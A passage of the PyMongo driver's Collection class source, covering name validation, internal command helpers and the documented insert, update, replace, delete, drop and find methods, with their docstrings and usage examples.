- `read_preference` (optional): The read preference to use. If
``None`` (the default) database.read_preference is used.
- `write_concern` (optional): An instance of
:class:`~pymongo.write_concern.WriteConcern`. If ``None`` (the
default) database.write_concern is used.
- `read_concern` (optional): An instance of
:class:`~pymongo.read_concern.ReadConcern`. If ``None`` (the
default) database.read_concern is used.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. If a collation is provided,
it will be passed to the create collection command. This option is
only supported on MongoDB 3.4 and above.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession` that is used with
the create collection command
- `**kwargs` (optional): additional keyword arguments will
be passed as options for the create collection command
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Support the `collation` option.
.. versionchanged:: 3.2
Added the read_concern option.
.. versionchanged:: 3.0
Added the codec_options, read_preference, and write_concern options.
Removed the uuid_subtype attribute.
:class:`~pymongo.collection.Collection` no longer returns an
instance of :class:`~pymongo.collection.Collection` for attribute
names with leading underscores. You must use dict-style lookups
instead::
collection['__my_collection__']
Not:
collection.__my_collection__
.. versionchanged:: 2.2
Removed deprecated argument: options
.. versionadded:: 2.1
uuid_subtype attribute
.. mongodoc:: collections
"""
super(Collection, self).__init__(
codec_options or database.codec_options,
read_preference or database.read_preference,
write_concern or database.write_concern,
read_concern or database.read_concern)
if not isinstance(name, string_type):
raise TypeError("name must be an instance "
"of %s" % (string_type.__name__,))
if not name or ".." in name:
raise InvalidName("collection names cannot be empty")
if "$" in name and not (name.startswith("oplog.$main") or
name.startswith("$cmd")):
raise InvalidName("collection names must not "
"contain '$': %r" % name)
if name[0] == "." or name[-1] == ".":
raise InvalidName("collection names must not start "
"or end with '.': %r" % name)
if "\x00" in name:
raise InvalidName("collection names must not contain the "
"null character")
collation = validate_collation_or_none(kwargs.pop('collation', None))
self.__database = database
self.__name = _unicode(name)
self.__full_name = _UJOIN % (self.__database.name, self.__name)
if create or kwargs or collation:
self.__create(kwargs, collation, session)
self.__write_response_codec_options = self.codec_options._replace(
unicode_decode_error_handler='replace',
document_class=dict)
def _socket_for_reads(self, session):
return self.__database.client._socket_for_reads(
self._read_preference_for(session))
def _socket_for_primary_reads(self, session):
read_pref = ((session and session._txn_read_preference())
or ReadPreference.PRIMARY)
return self.__database.client._socket_for_reads(read_pref), read_pref
def _socket_for_writes(self):
return self.__database.client._socket_for_writes()
def _command(self, sock_info, command, slave_ok=False,
read_preference=None,
codec_options=None, check=True, allowable_errors=None,
read_concern=None,
write_concern=None,
collation=None,
session=None,
retryable_write=False):
"""Internal command helper.
:Parameters:
- `sock_info` - A SocketInfo instance.
- `command` - The command itself, as a SON instance.
- `slave_ok`: whether to set the SlaveOkay wire protocol bit.
- `codec_options` (optional) - An instance of
:class:`~bson.codec_options.CodecOptions`.
- `check`: raise OperationFailure if there are errors
- `allowable_errors`: errors to ignore if `check` is True
- `read_concern` (optional) - An instance of
:class:`~pymongo.read_concern.ReadConcern`.
- `write_concern`: An instance of
:class:`~pymongo.write_concern.WriteConcern`. This option is only
valid for MongoDB 3.4 and above.
- `collation` (optional) - An instance of
:class:`~pymongo.collation.Collation`.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
The result document.
"""
with self.__database.client._tmp_session(session) as s:
return sock_info.command(
self.__database.name,
command,
slave_ok,
read_preference or self._read_preference_for(session),
codec_options or self.codec_options,
check,
allowable_errors,
read_concern=read_concern,
write_concern=write_concern,
parse_write_concern_error=True,
collation=collation,
session=s,
client=self.__database.client,
retryable_write=retryable_write)
def __create(self, options, collation, session):
"""Sends a create command with the given options.
"""
cmd = SON([("create", self.__name)])
if options:
if "size" in options:
options["size"] = float(options["size"])
cmd.update(options)
with self._socket_for_writes() as sock_info:
self._command(
sock_info, cmd, read_preference=ReadPreference.PRIMARY,
write_concern=self._write_concern_for(session),
collation=collation, session=session)
def __getattr__(self, name):
"""Get a sub-collection of this collection by name.
Raises InvalidName if an invalid collection name is used.
:Parameters:
- `name`: the name of the collection to get
"""
if name.startswith('_'):
full_name = _UJOIN % (self.__name, name)
raise AttributeError(
"Collection has no attribute %r. To access the %s"
" collection, use database['%s']." % (
name, full_name, full_name))
return self.__getitem__(name)
def __getitem__(self, name):
return Collection(self.__database,
_UJOIN % (self.__name, name),
False,
self.codec_options,
self.read_preference,
self.write_concern,
self.read_concern)
def __repr__(self):
return "Collection(%r, %r)" % (self.__database, self.__name)
def __eq__(self, other):
if isinstance(other, Collection):
return (self.__database == other.database and
self.__name == other.name)
return NotImplemented
def __ne__(self, other):
return not self == other
@property
def full_name(self):
"""The full name of this :class:`Collection`.
The full name is of the form `database_name.collection_name`.
"""
return self.__full_name
@property
def name(self):
"""The name of this :class:`Collection`."""
return self.__name
@property
def database(self):
"""The :class:`~pymongo.database.Database` that this
:class:`Collection` is a part of.
"""
return self.__database
def with_options(
self, codec_options=None, read_preference=None,
write_concern=None, read_concern=None):
"""Get a clone of this collection changing the specified settings.
>>> coll1.read_preference
Primary()
>>> from pymongo import ReadPreference
>>> coll2 = coll1.with_options(read_preference=ReadPreference.SECONDARY)
>>> coll1.read_preference
Primary()
>>> coll2.read_preference
Secondary(tag_sets=None)
:Parameters:
- `codec_options` (optional): An instance of
:class:`~bson.codec_options.CodecOptions`. If ``None`` (the
default) the :attr:`codec_options` of this :class:`Collection`
is used.
- `read_preference` (optional): The read preference to use. If
``None`` (the default) the :attr:`read_preference` of this
:class:`Collection` is used. See :mod:`~pymongo.read_preferences`
for options.
- `write_concern` (optional): An instance of
:class:`~pymongo.write_concern.WriteConcern`. If ``None`` (the
default) the :attr:`write_concern` of this :class:`Collection`
is used.
- `read_concern` (optional): An instance of
:class:`~pymongo.read_concern.ReadConcern`. If ``None`` (the
default) the :attr:`read_concern` of this :class:`Collection`
is used.
"""
return Collection(self.__database,
self.__name,
False,
codec_options or self.codec_options,
read_preference or self.read_preference,
write_concern or self.write_concern,
read_concern or self.read_concern)
def initialize_unordered_bulk_op(self, bypass_document_validation=False):
"""**DEPRECATED** - Initialize an unordered batch of write operations.
Operations will be performed on the server in arbitrary order,
possibly in parallel. All operations will be attempted.
:Parameters:
- `bypass_document_validation`: (optional) If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
Returns a :class:`~pymongo.bulk.BulkOperationBuilder` instance.
See :ref:`unordered_bulk` for examples.
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.5
Deprecated. Use :meth:`~pymongo.collection.Collection.bulk_write`
instead.
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 2.7
"""
warnings.warn("initialize_unordered_bulk_op is deprecated",
DeprecationWarning, stacklevel=2)
return BulkOperationBuilder(self, False, bypass_document_validation)
def initialize_ordered_bulk_op(self, bypass_document_validation=False):
"""**DEPRECATED** - Initialize an ordered batch of write operations.
Operations will be performed on the server serially, in the
order provided. If an error occurs all remaining operations
are aborted.
:Parameters:
- `bypass_document_validation`: (optional) If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
Returns a :class:`~pymongo.bulk.BulkOperationBuilder` instance.
See :ref:`ordered_bulk` for examples.
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.5
Deprecated. Use :meth:`~pymongo.collection.Collection.bulk_write`
instead.
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 2.7
"""
warnings.warn("initialize_ordered_bulk_op is deprecated",
DeprecationWarning, stacklevel=2)
return BulkOperationBuilder(self, True, bypass_document_validation)
def bulk_write(self, requests, ordered=True,
bypass_document_validation=False, session=None):
"""Send a batch of write operations to the server.
Requests are passed as a list of write operation instances (
:class:`~pymongo.operations.InsertOne`,
:class:`~pymongo.operations.UpdateOne`,
:class:`~pymongo.operations.UpdateMany`,
:class:`~pymongo.operations.ReplaceOne`,
:class:`~pymongo.operations.DeleteOne`, or
:class:`~pymongo.operations.DeleteMany`).
>>> for doc in db.test.find({}):
... print(doc)
...
{u'x': 1, u'_id': ObjectId('54f62e60fba5226811f634ef')}
{u'x': 1, u'_id': ObjectId('54f62e60fba5226811f634f0')}
>>> # DeleteMany, UpdateOne, and UpdateMany are also available.
...
>>> from pymongo import InsertOne, DeleteOne, ReplaceOne
>>> requests = [InsertOne({'y': 1}), DeleteOne({'x': 1}),
... ReplaceOne({'w': 1}, {'z': 1}, upsert=True)]
>>> result = db.test.bulk_write(requests)
>>> result.inserted_count
1
>>> result.deleted_count
1
>>> result.modified_count
0
>>> result.upserted_ids
{2: ObjectId('54f62ee28891e756a6e1abd5')}
>>> for doc in db.test.find({}):
... print(doc)
...
{u'x': 1, u'_id': ObjectId('54f62e60fba5226811f634f0')}
{u'y': 1, u'_id': ObjectId('54f62ee2fba5226811f634f1')}
{u'z': 1, u'_id': ObjectId('54f62ee28891e756a6e1abd5')}
:Parameters:
- `requests`: A list of write operations (see examples above).
- `ordered` (optional): If ``True`` (the default) requests will be
performed on the server serially, in the order provided. If an error
occurs all remaining operations are aborted. If ``False`` requests
will be performed on the server in arbitrary order, possibly in
parallel, and all operations will be attempted.
- `bypass_document_validation`: (optional) If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
An instance of :class:`~pymongo.results.BulkWriteResult`.
.. seealso:: :ref:`writes-and-ids`
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 3.0
"""
common.validate_list("requests", requests)
blk = _Bulk(self, ordered, bypass_document_validation)
for request in requests:
try:
request._add_to_bulk(blk)
except AttributeError:
raise TypeError("%r is not a valid request" % (request,))
write_concern = self._write_concern_for(session)
bulk_api_result = blk.execute(write_concern, session)
if bulk_api_result is not None:
return BulkWriteResult(bulk_api_result, True)
return BulkWriteResult({}, False)
def _legacy_write(self, sock_info, name, cmd, op_id,
bypass_doc_val, func, *args):
"""Internal legacy unacknowledged write helper."""
# Cannot have both unacknowledged write and bypass document validation.
if bypass_doc_val and sock_info.max_wire_version >= 4:
raise OperationFailure("Cannot set bypass_document_validation with"
" unacknowledged write concern")
listeners = self.database.client._event_listeners
publish = listeners.enabled_for_commands
if publish:
start = datetime.datetime.now()
args = args + (sock_info.compression_context,)
rqst_id, msg, max_size = func(*args)
if publish:
duration = datetime.datetime.now() - start
listeners.publish_command_start(
cmd, self.__database.name, rqst_id, sock_info.address, op_id)
start = datetime.datetime.now()
try:
result = sock_info.legacy_write(rqst_id, msg, max_size, False)
except Exception as exc:
if publish:
dur = (datetime.datetime.now() - start) + duration
if isinstance(exc, OperationFailure):
details = exc.details
# Succeed if GLE was successful and this is a write error.
if details.get("ok") and "n" in details:
reply = message._convert_write_result(
name, cmd, details)
listeners.publish_command_success(
dur, reply, name, rqst_id, sock_info.address, op_id)
raise
else:
details = message._convert_exception(exc)
listeners.publish_command_failure(
dur, details, name, rqst_id, sock_info.address, op_id)
raise
if publish:
if result is not None:
reply = message._convert_write_result(name, cmd, result)
else:
# Comply with APM spec.
reply = {'ok': 1}
duration = (datetime.datetime.now() - start) + duration
listeners.publish_command_success(
duration, reply, name, rqst_id, sock_info.address, op_id)
return result
def _insert_one(
self, doc, ordered,
check_keys, manipulate, write_concern, op_id, bypass_doc_val,
session):
"""Internal helper for inserting a single document."""
if manipulate:
doc = self.__database._apply_incoming_manipulators(doc, self)
if not isinstance(doc, RawBSONDocument) and '_id' not in doc:
doc['_id'] = ObjectId()
doc = self.__database._apply_incoming_copying_manipulators(doc,
self)
write_concern = write_concern or self.write_concern
acknowledged = write_concern.acknowledged
command = SON([('insert', self.name),
('ordered', ordered),
('documents', [doc])])
if not write_concern.is_server_default:
command['writeConcern'] = write_concern.document
def _insert_command(session, sock_info, retryable_write):
if not sock_info.op_msg_enabled and not acknowledged:
# Legacy OP_INSERT.
return self._legacy_write(
sock_info, 'insert', command, op_id,
bypass_doc_val, message.insert, self.__full_name,
[doc], check_keys, False, write_concern.document, False,
self.__write_response_codec_options)
if bypass_doc_val and sock_info.max_wire_version >= 4:
command['bypassDocumentValidation'] = True
result = sock_info.command(
self.__database.name,
command,
write_concern=write_concern,
codec_options=self.__write_response_codec_options,
check_keys=check_keys,
session=session,
client=self.__database.client,
retryable_write=retryable_write)
_check_write_command_response(result)
self.__database.client._retryable_write(
acknowledged, _insert_command, session)
if not isinstance(doc, RawBSONDocument):
return doc.get('_id')
def _insert(self, docs, ordered=True, check_keys=True,
manipulate=False, write_concern=None, op_id=None,
bypass_doc_val=False, session=None):
"""Internal insert helper."""
if isinstance(docs, abc.Mapping):
return self._insert_one(
docs, ordered, check_keys, manipulate, write_concern, op_id,
bypass_doc_val, session)
ids = []
if manipulate:
def gen():
"""Generator that applies SON manipulators to each document
and adds _id if necessary.
"""
_db = self.__database
for doc in docs:
# Apply user-configured SON manipulators. This order of
# operations is required for backwards compatibility,
# see PYTHON-709.
doc = _db._apply_incoming_manipulators(doc, self)
if not (isinstance(doc, RawBSONDocument) or '_id' in doc):
doc['_id'] = ObjectId()
doc = _db._apply_incoming_copying_manipulators(doc, self)
ids.append(doc['_id'])
yield doc
else:
def gen():
"""Generator that only tracks existing _ids."""
for doc in docs:
# Don't inflate RawBSONDocument by touching fields.
if not isinstance(doc, RawBSONDocument):
ids.append(doc.get('_id'))
yield doc
write_concern = write_concern or self._write_concern_for(session)
blk = _Bulk(self, ordered, bypass_doc_val)
blk.ops = [(message._INSERT, doc) for doc in gen()]
try:
blk.execute(write_concern, session=session)
except BulkWriteError as bwe:
_raise_last_error(bwe.details)
return ids
def insert_one(self, document, bypass_document_validation=False,
session=None):
"""Insert a single document.
>>> db.test.count_documents({'x': 1})
0
>>> result = db.test.insert_one({'x': 1})
>>> result.inserted_id
ObjectId('54f112defba522406c9cc208')
>>> db.test.find_one({'x': 1})
{u'x': 1, u'_id': ObjectId('54f112defba522406c9cc208')}
:Parameters:
- `document`: The document to insert. Must be a mutable mapping
type. If the document does not have an _id field one will be
added automatically.
- `bypass_document_validation`: (optional) If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
- An instance of :class:`~pymongo.results.InsertOneResult`.
.. seealso:: :ref:`writes-and-ids`
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 3.0
"""
common.validate_is_document_type("document", document)
if not (isinstance(document, RawBSONDocument) or "_id" in document):
document["_id"] = ObjectId()
write_concern = self._write_concern_for(session)
return InsertOneResult(
self._insert(document,
write_concern=write_concern,
bypass_doc_val=bypass_document_validation,
session=session),
write_concern.acknowledged)
def insert_many(self, documents, ordered=True,
bypass_document_validation=False, session=None):
"""Insert an iterable of documents.
>>> db.test.count_documents({})
0
>>> result = db.test.insert_many([{'x': i} for i in range(2)])
>>> result.inserted_ids
[ObjectId('54f113fffba522406c9cc20e'), ObjectId('54f113fffba522406c9cc20f')]
>>> db.test.count_documents({})
2
:Parameters:
- `documents`: A iterable of documents to insert.
- `ordered` (optional): If ``True`` (the default) documents will be
inserted on the server serially, in the order provided. If an error
occurs all remaining inserts are aborted. If ``False``, documents
will be inserted on the server in arbitrary order, possibly in
parallel, and all document inserts will be attempted.
- `bypass_document_validation`: (optional) If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
An instance of :class:`~pymongo.results.InsertManyResult`.
.. seealso:: :ref:`writes-and-ids`
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 3.0
"""
if not isinstance(documents, abc.Iterable) or not documents:
raise TypeError("documents must be a non-empty list")
inserted_ids = []
def gen():
"""A generator that validates documents and handles _ids."""
for document in documents:
common.validate_is_document_type("document", document)
if not isinstance(document, RawBSONDocument):
if "_id" not in document:
document["_id"] = ObjectId()
inserted_ids.append(document["_id"])
yield (message._INSERT, document)
write_concern = self._write_concern_for(session)
blk = _Bulk(self, ordered, bypass_document_validation)
blk.ops = [doc for doc in gen()]
blk.execute(write_concern, session=session)
return InsertManyResult(inserted_ids, write_concern.acknowledged)
def _update(self, sock_info, criteria, document, upsert=False,
check_keys=True, multi=False, manipulate=False,
write_concern=None, op_id=None, ordered=True,
bypass_doc_val=False, collation=None, array_filters=None,
session=None, retryable_write=False):
"""Internal update / replace helper."""
common.validate_boolean("upsert", upsert)
if manipulate:
document = self.__database._fix_incoming(document, self)
collation = validate_collation_or_none(collation)
write_concern = write_concern or self.write_concern
acknowledged = write_concern.acknowledged
update_doc = SON([('q', criteria),
('u', document),
('multi', multi),
('upsert', upsert)])
if collation is not None:
if sock_info.max_wire_version < 5:
raise ConfigurationError(
'Must be connected to MongoDB 3.4+ to use collations.')
elif not acknowledged:
raise ConfigurationError(
'Collation is unsupported for unacknowledged writes.')
else:
update_doc['collation'] = collation
if array_filters is not None:
if sock_info.max_wire_version < 6:
raise ConfigurationError(
'Must be connected to MongoDB 3.6+ to use array_filters.')
elif not acknowledged:
raise ConfigurationError(
'arrayFilters is unsupported for unacknowledged writes.')
else:
update_doc['arrayFilters'] = array_filters
command = SON([('update', self.name),
('ordered', ordered),
('updates', [update_doc])])
if not write_concern.is_server_default:
command['writeConcern'] = write_concern.document
if not sock_info.op_msg_enabled and not acknowledged:
# Legacy OP_UPDATE.
return self._legacy_write(
sock_info, 'update', command, op_id,
bypass_doc_val, message.update, self.__full_name, upsert,
multi, criteria, document, False, write_concern.document,
check_keys, self.__write_response_codec_options)
# Update command.
if bypass_doc_val and sock_info.max_wire_version >= 4:
command['bypassDocumentValidation'] = True
# The command result has to be published for APM unmodified
# so we make a shallow copy here before adding updatedExisting.
result = sock_info.command(
self.__database.name,
command,
write_concern=write_concern,
codec_options=self.__write_response_codec_options,
session=session,
client=self.__database.client,
retryable_write=retryable_write).copy()
_check_write_command_response(result)
# Add the updatedExisting field for compatibility.
if result.get('n') and 'upserted' not in result:
result['updatedExisting'] = True
else:
result['updatedExisting'] = False
# MongoDB >= 2.6.0 returns the upsert _id in an array
# element. Break it out for backward compatibility.
if 'upserted' in result:
result['upserted'] = result['upserted'][0]['_id']
if not acknowledged:
return None
return result
def _update_retryable(
self, criteria, document, upsert=False,
check_keys=True, multi=False, manipulate=False,
write_concern=None, op_id=None, ordered=True,
bypass_doc_val=False, collation=None, array_filters=None,
session=None):
"""Internal update / replace helper."""
def _update(session, sock_info, retryable_write):
return self._update(
sock_info, criteria, document, upsert=upsert,
check_keys=check_keys, multi=multi, manipulate=manipulate,
write_concern=write_concern, op_id=op_id, ordered=ordered,
bypass_doc_val=bypass_doc_val, collation=collation,
array_filters=array_filters, session=session,
retryable_write=retryable_write)
return self.__database.client._retryable_write(
(write_concern or self.write_concern).acknowledged and not multi,
_update, session)
def replace_one(self, filter, replacement, upsert=False,
bypass_document_validation=False, collation=None,
session=None):
"""Replace a single document matching the filter.
>>> for doc in db.test.find({}):
... print(doc)
...
{u'x': 1, u'_id': ObjectId('54f4c5befba5220aa4d6dee7')}
>>> result = db.test.replace_one({'x': 1}, {'y': 1})
>>> result.matched_count
1
>>> result.modified_count
1
>>> for doc in db.test.find({}):
... print(doc)
...
{u'y': 1, u'_id': ObjectId('54f4c5befba5220aa4d6dee7')}
The *upsert* option can be used to insert a new document if a matching
document does not exist.
>>> result = db.test.replace_one({'x': 1}, {'x': 1}, True)
>>> result.matched_count
0
>>> result.modified_count
0
>>> result.upserted_id
ObjectId('54f11e5c8891e756a6e1abd4')
>>> db.test.find_one({'x': 1})
{u'x': 1, u'_id': ObjectId('54f11e5c8891e756a6e1abd4')}
:Parameters:
- `filter`: A query that matches the document to replace.
- `replacement`: The new document.
- `upsert` (optional): If ``True``, perform an insert if no documents
match the filter.
- `bypass_document_validation`: (optional) If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
- An instance of :class:`~pymongo.results.UpdateResult`.
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Added the `collation` option.
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 3.0
"""
common.validate_is_mapping("filter", filter)
common.validate_ok_for_replace(replacement)
write_concern = self._write_concern_for(session)
return UpdateResult(
self._update_retryable(
filter, replacement, upsert,
write_concern=write_concern,
bypass_doc_val=bypass_document_validation,
collation=collation, session=session),
write_concern.acknowledged)
def update_one(self, filter, update, upsert=False,
bypass_document_validation=False,
collation=None, array_filters=None, session=None):
"""Update a single document matching the filter.
>>> for doc in db.test.find():
... print(doc)
...
{u'x': 1, u'_id': 0}
{u'x': 1, u'_id': 1}
{u'x': 1, u'_id': 2}
>>> result = db.test.update_one({'x': 1}, {'$inc': {'x': 3}})
>>> result.matched_count
1
>>> result.modified_count
1
>>> for doc in db.test.find():
... print(doc)
...
{u'x': 4, u'_id': 0}
{u'x': 1, u'_id': 1}
{u'x': 1, u'_id': 2}
:Parameters:
- `filter`: A query that matches the document to update.
- `update`: The modifications to apply.
- `upsert` (optional): If ``True``, perform an insert if no documents
match the filter.
- `bypass_document_validation`: (optional) If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
- `array_filters` (optional): A list of filters specifying which
array elements an update should apply. Requires MongoDB 3.6+.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
- An instance of :class:`~pymongo.results.UpdateResult`.
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.6
Added the `array_filters` and ``session`` parameters.
.. versionchanged:: 3.4
Added the `collation` option.
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 3.0
"""
common.validate_is_mapping("filter", filter)
common.validate_ok_for_update(update)
common.validate_list_or_none('array_filters', array_filters)
write_concern = self._write_concern_for(session)
return UpdateResult(
self._update_retryable(
filter, update, upsert, check_keys=False,
write_concern=write_concern,
bypass_doc_val=bypass_document_validation,
collation=collation, array_filters=array_filters,
session=session),
write_concern.acknowledged)
def update_many(self, filter, update, upsert=False, array_filters=None,
bypass_document_validation=False, collation=None,
session=None):
"""Update one or more documents that match the filter.
>>> for doc in db.test.find():
... print(doc)
...
{u'x': 1, u'_id': 0}
{u'x': 1, u'_id': 1}
{u'x': 1, u'_id': 2}
>>> result = db.test.update_many({'x': 1}, {'$inc': {'x': 3}})
>>> result.matched_count
3
>>> result.modified_count
3
>>> for doc in db.test.find():
... print(doc)
...
{u'x': 4, u'_id': 0}
{u'x': 4, u'_id': 1}
{u'x': 4, u'_id': 2}
:Parameters:
- `filter`: A query that matches the documents to update.
- `update`: The modifications to apply.
- `upsert` (optional): If ``True``, perform an insert if no documents
match the filter.
- `bypass_document_validation` (optional): If ``True``, allows the
write to opt-out of document level validation. Default is
``False``.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
- `array_filters` (optional): A list of filters specifying which
array elements an update should apply. Requires MongoDB 3.6+.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
- An instance of :class:`~pymongo.results.UpdateResult`.
.. note:: `bypass_document_validation` requires server version
**>= 3.2**
.. versionchanged:: 3.6
Added ``array_filters`` and ``session`` parameters.
.. versionchanged:: 3.4
Added the `collation` option.
.. versionchanged:: 3.2
Added bypass_document_validation support
.. versionadded:: 3.0
"""
common.validate_is_mapping("filter", filter)
common.validate_ok_for_update(update)
common.validate_list_or_none('array_filters', array_filters)
write_concern = self._write_concern_for(session)
return UpdateResult(
self._update_retryable(
filter, update, upsert, check_keys=False, multi=True,
write_concern=write_concern,
bypass_doc_val=bypass_document_validation,
collation=collation, array_filters=array_filters,
session=session),
write_concern.acknowledged)
def drop(self, session=None):
"""Alias for :meth:`~pymongo.database.Database.drop_collection`.
:Parameters:
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
The following two calls are equivalent:
>>> db.foo.drop()
>>> db.drop_collection("foo")
.. versionchanged:: 3.7
:meth:`drop` now respects this :class:`Collection`'s :attr:`write_concern`.
.. versionchanged:: 3.6
Added ``session`` parameter.
"""
dbo = self.__database.client.get_database(
self.__database.name,
self.codec_options,
self.read_preference,
self.write_concern,
self.read_concern)
dbo.drop_collection(self.__name, session=session)
def _delete(
self, sock_info, criteria, multi,
write_concern=None, op_id=None, ordered=True,
collation=None, session=None, retryable_write=False):
"""Internal delete helper."""
common.validate_is_mapping("filter", criteria)
write_concern = write_concern or self.write_concern
acknowledged = write_concern.acknowledged
delete_doc = SON([('q', criteria),
('limit', int(not multi))])
collation = validate_collation_or_none(collation)
if collation is not None:
if sock_info.max_wire_version < 5:
raise ConfigurationError(
'Must be connected to MongoDB 3.4+ to use collations.')
elif not acknowledged:
raise ConfigurationError(
'Collation is unsupported for unacknowledged writes.')
else:
delete_doc['collation'] = collation
command = SON([('delete', self.name),
('ordered', ordered),
('deletes', [delete_doc])])
if not write_concern.is_server_default:
command['writeConcern'] = write_concern.document
if not sock_info.op_msg_enabled and not acknowledged:
# Legacy OP_DELETE.
return self._legacy_write(
sock_info, 'delete', command, op_id,
False, message.delete, self.__full_name, criteria,
False, write_concern.document,
self.__write_response_codec_options,
int(not multi))
# Delete command.
result = sock_info.command(
self.__database.name,
command,
write_concern=write_concern,
codec_options=self.__write_response_codec_options,
session=session,
client=self.__database.client,
retryable_write=retryable_write)
_check_write_command_response(result)
return result
def _delete_retryable(
self, criteria, multi,
write_concern=None, op_id=None, ordered=True,
collation=None, session=None):
"""Internal delete helper."""
def _delete(session, sock_info, retryable_write):
return self._delete(
sock_info, criteria, multi,
write_concern=write_concern, op_id=op_id, ordered=ordered,
collation=collation, session=session,
retryable_write=retryable_write)
return self.__database.client._retryable_write(
(write_concern or self.write_concern).acknowledged and not multi,
_delete, session)
def delete_one(self, filter, collation=None, session=None):
"""Delete a single document matching the filter.
>>> db.test.count_documents({'x': 1})
3
>>> result = db.test.delete_one({'x': 1})
>>> result.deleted_count
1
>>> db.test.count_documents({'x': 1})
2
:Parameters:
- `filter`: A query that matches the document to delete.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
- An instance of :class:`~pymongo.results.DeleteResult`.
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Added the `collation` option.
.. versionadded:: 3.0
"""
write_concern = self._write_concern_for(session)
return DeleteResult(
self._delete_retryable(
filter, False,
write_concern=write_concern,
collation=collation, session=session),
write_concern.acknowledged)
def delete_many(self, filter, collation=None, session=None):
"""Delete one or more documents matching the filter.
>>> db.test.count_documents({'x': 1})
3
>>> result = db.test.delete_many({'x': 1})
>>> result.deleted_count
3
>>> db.test.count_documents({'x': 1})
0
:Parameters:
- `filter`: A query that matches the documents to delete.
- `collation` (optional): An instance of
:class:`~pymongo.collation.Collation`. This option is only supported
on MongoDB 3.4 and above.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
- An instance of :class:`~pymongo.results.DeleteResult`.
.. versionchanged:: 3.6
Added ``session`` parameter.
.. versionchanged:: 3.4
Added the `collation` option.
.. versionadded:: 3.0
"""
write_concern = self._write_concern_for(session)
return DeleteResult(
self._delete_retryable(
filter, True,
write_concern=write_concern,
collation=collation, session=session),
write_concern.acknowledged)
def find_one(self, filter=None, *args, **kwargs):
"""Get a single document from the database.
All arguments to :meth:`find` are also valid arguments for
:meth:`find_one`, although any `limit` argument will be
ignored. Returns a single document, or ``None`` if no matching
document is found.
The :meth:`find_one` method obeys the :attr:`read_preference` of
this :class:`Collection`.
:Parameters:
- `filter` (optional): a dictionary specifying
the query to be performed OR any other type to be used as
the value for a query for ``"_id"``.
- `*args` (optional): any additional positional arguments
are the same as the arguments to :meth:`find`.
- `**kwargs` (optional): any additional keyword arguments
are the same as the arguments to :meth:`find`.
>>> collection.find_one(max_time_ms=100)
"""
if (filter is not None and not
isinstance(filter, abc.Mapping)):
filter = {"_id": filter}
cursor = self.find(filter, *args, **kwargs)
for result in cursor.limit(-1):
return result
return None
def find(self, *args, **kwargs):
"""Query the database.
The `filter` argument is a prototype document that all results
must match. For example:
>>> db.test.find({"hello": "world"})
only matches documents that have a key "hello" with value
"world". Matches can have other keys *in addition* to
"hello". The `projection` argument is used to specify a subset
of fields that should be included in the result documents. By
limiting results to a certain subset of fields you can cut
down on network traffic and decoding time.
Raises :class:`TypeError` if any of the arguments are of
improper type. Returns an instance of
:class:`~pymongo.cursor.Cursor` corresponding to this query.
The :meth:`find` method obeys the :attr:`read_preference` of
this :class:`Collection`.
:Parameters:
- `filter` (optional): a SON object specifying elements which
must be present for a document to be included in the
result set
- `projection` (optional): a list of field names that should be
returned in the result set or a dict specifying the fields
to include or exclude. If `projection` is a list "_id" will
always be returned. Use a dict to exclude fields from
the result (e.g. projection={'_id': False}).
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
- `skip` (optional): the number of documents to omit (from
the start of the result set) when returning the results
- `limit` (optional): the maximum number of results to
return
- `no_cursor_timeout` (optional): if False (the default), any
returned cursor is closed by the server after 10 minutes of
inactivity. If set to True, the returned cursor will never
time out on the server. Care should be taken to ensure that
cursors with no_cursor_timeout turned on are properly closed.
